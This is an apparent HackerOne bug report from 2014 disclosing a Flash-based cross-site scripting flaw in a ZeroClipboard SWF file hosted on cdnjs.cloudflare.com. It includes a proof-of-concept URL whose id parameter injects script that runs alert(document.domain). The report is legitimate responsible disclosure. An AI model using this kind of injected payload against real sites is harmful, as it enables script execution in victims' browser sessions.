Cloudflare: Flash-based XSS in cdnjs.cloudflare.com subdomain

2014-04-22T10:44:27
ID H1:9017
Type hackerone
Reporter prakharprasad
Modified 2014-07-17T19:34:19

Description

Hi,

There's a Flash-based XSS on cdnjs.cloudflare.com.

Proof-of-Concept:

1.Click on the link:

https://cdnjs.cloudflare.com/ajax/libs/zeroclipboard/1.0.8/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.domain)//&width&height

2.You shall see a Javascript alert()function executing in context of the subdomain.

>Original Advisory

Thanks!

@prakharprasad